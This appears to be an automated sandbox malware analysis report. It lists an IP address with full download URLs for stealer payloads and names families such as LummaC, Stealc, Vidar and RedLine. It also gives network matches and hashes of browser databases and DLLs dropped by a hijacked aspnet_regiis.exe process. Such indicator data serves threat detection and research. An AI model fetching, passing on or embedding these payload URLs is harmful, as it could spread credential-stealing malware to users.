147.45.44.104 | nJohIBtNm5.exe | malicious | LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLine | 147.45.44.104/revada/66fa80c468fe3_Channel2.exe
147.45.44.104 | 66fb252fe232b_Patksl.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | 147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe
147.45.44.104 | file.exe | malicious | LummaC, Stealc, Vidar | 147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe
147.45.44.104 | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | 147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe
147.45.44.104 | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | 147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe
147.45.44.104 | file.exe | malicious | RDPWrap Tool | 147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe
147.45.44.104 | file.exe | malicious | RDPWrap Tool | 147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                        • 147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                        • 147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                        • 147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: steamcommunity.com
tcU5sAPsAc.exe | malicious | RedLine
• 104.102.49.254
Setup.exe | malicious | LummaC, MicroClip
• 104.102.49.254
66fb252fe232b_Patksl.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar
• 104.102.49.254
file.exe | malicious | LummaC, Stealc, Vidar
• 104.102.49.254
kuly.exe | malicious | LummaC
• 104.102.49.254
webNY0O9Sr.exe | malicious | LummaC
• 104.102.49.254
klFMCT64RF.exe | malicious | LummaC
• 104.102.49.254
EKAHephXb2.exe | malicious | LummaC, Go Injector, LummaC Stealer
• 104.102.49.254
webNY0O9Sr.exe | malicious | LummaC
• 104.102.49.254
klFMCT64RF.exe | malicious | LummaC
• 104.102.49.254
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: FREE-NET-ASFREEnetEU
nJohIBtNm5.exe | malicious | LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLine
• 147.45.60.44
66fb252fe232b_Patksl.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar
• 147.45.44.104
file.exe | malicious | LummaC, Stealc, Vidar
• 147.45.44.104
file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar
• 147.45.44.104
file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar
• 147.45.44.104
file.exe | malicious | RDPWrap Tool
• 147.45.44.104
file.exe | malicious | RDPWrap Tool
• 147.45.44.104
file.exe | malicious | LummaC, Stealc, Vidar
• 147.45.44.104
file.exe | malicious | LummaC, Stealc, Vidar
• 147.45.44.104
file.exe | malicious | LummaC, Stealc, Vidar
• 147.45.44.104
Match: AKAMAI-ASUS
Globalfoundries.com_Report_46279.pdf | malicious | HTMLPhisher
• 23.217.172.185
cleu.cmD | malicious | Unknown
• 23.47.168.24
kUiqbpzmbo.exe | malicious | XWorm
• 92.122.18.57
Play_VM-NowCWhiteAudiowav012.html | malicious | Tycoon2FA
• 2.19.224.93
tcU5sAPsAc.exe | malicious | RedLine
• 104.102.49.254
deveba=.html | malicious | Unknown
• 173.223.116.167
Proposal From Transom.pdf | malicious | HtmlDropper
• 23.203.104.175
Payout_receipt.pdf | malicious | Unknown
• 96.17.64.189
Visix Digital Signage.pdf | malicious | Unknown
• 23.203.104.175
novo.arm7.elf | malicious | Mirai, Moobot
• 184.28.163.53
Match: HETZNER-ASDE
MZs41xJfcH.exe | malicious | PureLog Stealer, Quasar, zgRAT
• 195.201.57.90
N5mRSBWm8P.exe | malicious | Quasar
• 195.201.57.90
mpsl.elf | malicious | Mirai
• 197.242.86.248
ppc.elf | malicious | Mirai
• 197.242.86.252
novo.mpsl.elf | malicious | Mirai, Moobot
• 5.75.175.36
novo.x86.elf | malicious | Mirai, Moobot
• 116.203.33.160
yakov.spc.elf | malicious | Mirai
• 78.47.94.116
66fb252fe232b_Patksl.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar
• 49.12.197.9
file.exe | malicious | LummaC, Stealc, Vidar
• 49.12.197.9
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: 51c64c77e60f3980eea90869b68c58a8
66fb252fe232b_Patksl.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar
• 49.12.197.9
file.exe | malicious | LummaC, Stealc, Vidar
• 49.12.197.9
file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar
• 49.12.197.9
file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar
• 49.12.197.9
file.exe | malicious | LummaC, Stealc, Vidar
• 49.12.197.9
file.exe | malicious | LummaC, Stealc, Vidar
• 49.12.197.9
file.exe | malicious | LummaC, Stealc, Vidar
• 49.12.197.9
file.exe | malicious | LummaC, Stealc, Vidar
• 49.12.197.9
6JA2YPtbeB.exe | malicious | LummaC, Stealc, Vidar
• 49.12.197.9
hTR7xY0d0V.exe | malicious | LummaC, Stealc, Vidar
• 49.12.197.9
Match: 37f463bf4616ecd445d4a1937da06e19
MZs41xJfcH.exe | malicious | PureLog Stealer, Quasar, zgRAT
• 104.102.49.254
C5Nbn7P6GJ.exe | malicious | XRed, XWorm
• 104.102.49.254
66fb252fe232b_Patksl.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar
• 104.102.49.254
file.exe | malicious | LummaC, Stealc, Vidar
• 104.102.49.254
lFsYXvJPWw.exe | malicious | XRed
• 104.102.49.254
file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar
• 104.102.49.254
563299efce875400a8d9b44b96597c8e-sample (1).zip | malicious | Unknown
• 104.102.49.254
file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar
• 104.102.49.254
PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs | malicious | GuLoader, Lokibot
• 104.102.49.254
AMG Cargo Logistic.docx | malicious | Unknown
• 104.102.49.254
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: C:\ProgramData\freebl3.dll
file.exe | malicious | Stealc, Vidar
file.exe | malicious | Stealc, Vidar
nJohIBtNm5.exe | malicious | LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLine
file.exe | malicious | Stealc, Vidar
file.exe | malicious | Stealc, Vidar
66fb252fe232b_Patksl.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar
file.exe | malicious | LummaC, Stealc, Vidar
file.exe | malicious | Stealc, Vidar
file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar
file.exe | malicious | Stealc, Vidar
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                            Category:modified
                                                                                                                                                                            Size (bytes):13
                                                                                                                                                                            Entropy (8bit):2.8150724101159437
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:+MEM:+BM
                                                                                                                                                                            MD5:AEE9784C03B80D38D3271CDE2B252B8D
                                                                                                                                                                            SHA1:E5FD9AA24C9417E7332E6F25936AE2A6EC8F1524
                                                                                                                                                                            SHA-256:27C2CCD962C2B8DCCB52FE3688AB236F186F7A41FD57D810478712048E9AD3F8
                                                                                                                                                                            SHA-512:A83C2F678A77228F5C7F2FB61A723217892B8422913739D1C65CB97701C341361EEEE617E9D050A86B552DB4DD87B18CFB94443977A75A5862171346609E9472
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Preview:Unknown error
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):106496
                                                                                                                                                                            Entropy (8bit):1.1371207751183456
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/I4:MnlyfnGtxnfVuSVumEHFw4
                                                                                                                                                                            MD5:643AC1E34BE0FDE5FA0CD279E476DF3A
                                                                                                                                                                            SHA1:241B9EA323D640B82E8085803CBE3F61FEEA458F
                                                                                                                                                                            SHA-256:C44B4270F1F0B4FCB13533D2FC023443DBAFB24D355286C6AE1493DBCD96B7E2
                                                                                                                                                                            SHA-512:73D0F938535D93CC962EF752B1544FA8A2E4194C8979FB4778D0B84B70D32C6EDF8CC8559C9CEFBAF9681FB3BC1D345086AFCA4CA5FC8FB88100E48679AB1EF8
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):159744
                                                                                                                                                                            Entropy (8bit):0.5394293526345721
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                            MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                            SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                            SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                            SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):40960
                                                                                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):196608
                                                                                                                                                                            Entropy (8bit):1.1221538113908904
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                                                                                                                                                                            MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
                                                                                                                                                                            SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                                                                                                                                                                            SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                                                                                                                                                                            SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:ASCII text, with very long lines (1765), with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):9526
                                                                                                                                                                            Entropy (8bit):5.515924904533179
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:efniR4oYbBp6Sp0pUhUxaXd6Y4nysZM2WklbBNBw8DUSl:hejGpCUvY4ysn7tpwx0
                                                                                                                                                                            MD5:4580799F1DC5720A7EC1766400E98740
                                                                                                                                                                            SHA1:92FD30F47EC545245B934EA492B3C64D5E609AA9
                                                                                                                                                                            SHA-256:57F457D69933E9E8A98C32A05EEE96171419977D45AFFA674A9761556656B9FA
                                                                                                                                                                            SHA-512:C0787F6584D1D26EBFD5AE59F32046CF1FF5AD1BEB1443F2FE93EB89EFA2F216CBC98E101BA3E38A2837ED9411A9DE1370E29ED96E83D8096547E53FEE964567
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "d3d72102-142d-47cc-a7b7-5b20541f2540");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696496527);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696496528);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):155648
                                                                                                                                                                            Entropy (8bit):0.5407252242845243
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                            MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                            SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                            SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                            SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):98304
                                                                                                                                                                            Entropy (8bit):0.08235737944063153
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                            MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                            SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                            SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                            SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                            Entropy (8bit):0.017262956703125623
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                            MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                            SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                            SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                            SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):5242880
                                                                                                                                                                            Entropy (8bit):0.03862698848467049
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:58rJQaXoMXp0VW9FxWHxAserRNbekZ3DmVxL1HI:58r54w0VW3xWmfRFj381
                                                                                                                                                                            MD5:507BA3B63F5856A191688A30D7E2A93A
                                                                                                                                                                            SHA1:1B799649D965FF1562753A9EB9B04AC83E5D7C57
                                                                                                                                                                            SHA-256:10A34BE61CD43716879A320800A262D0397EA3A8596711BDAE3789B08CB38EF8
                                                                                                                                                                            SHA-512:7750584100A725964CAE3A95EC15116CDFE02DE94EFE545AA84933D6002C767F6D6AF9D339F257ED80BDAD233DBF3A1041AB98AB4BF8B6427B5958C66DCEB55F
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                            Entropy (8bit):0.017262956703125623
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                            MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                            SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                            SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                            SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                            Entropy (8bit):0.6732424250451717
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):51200
                                                                                                                                                                            Entropy (8bit):0.8746135976761988
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                            Entropy (8bit):0.8467337400211222
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOiICtj+tCXq4E1:TeAFawNLopFgU10XJBO+tq0qj
                                                                                                                                                                            MD5:7A03CC0EAD0AEFF210C3E60823AAA5EC
                                                                                                                                                                            SHA1:8B9C99FBEC440663C71F10F70B9386C68CF0EC1D
                                                                                                                                                                            SHA-256:D19C0286BB552C8F121A87A8B483E4997F846F0EB586F6BAF269C352678356CF
                                                                                                                                                                            SHA-512:8BF799B9351399523796198E1B1160AD81E1C153148D24505AAD28143698DAF77665C26BBFB24650EB150AF8D92DD1623AE8ECB62D29C93EC3E4BB206E0C83DD
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):685392
                                                                                                                                                                            Entropy (8bit):6.872871740790978
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                            MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                            SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                            SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                            SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                            • Filename: file.exe, Detection: malicious
                                                                                                                                                                            • Filename: file.exe, Detection: malicious
                                                                                                                                                                            • Filename: nJohIBtNm5.exe, Detection: malicious
                                                                                                                                                                            • Filename: file.exe, Detection: malicious
                                                                                                                                                                            • Filename: file.exe, Detection: malicious
                                                                                                                                                                            • Filename: 66fb252fe232b_Patksl.exe, Detection: malicious
                                                                                                                                                                            • Filename: file.exe, Detection: malicious
                                                                                                                                                                            • Filename: file.exe, Detection: malicious
                                                                                                                                                                            • Filename: file.exe, Detection: malicious
                                                                                                                                                                            • Filename: file.exe, Detection: malicious
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):608080
                                                                                                                                                                            Entropy (8bit):6.833616094889818
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                            MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                            SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                            SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                            SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):450024
                                                                                                                                                                            Entropy (8bit):6.673992339875127
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                            MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                            SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                            SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                            SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2046288
                                                                                                                                                                            Entropy (8bit):6.787733948558952
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                            MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                            SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                            SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                            SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):257872
                                                                                                                                                                            Entropy (8bit):6.727482641240852
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                            MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                            SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
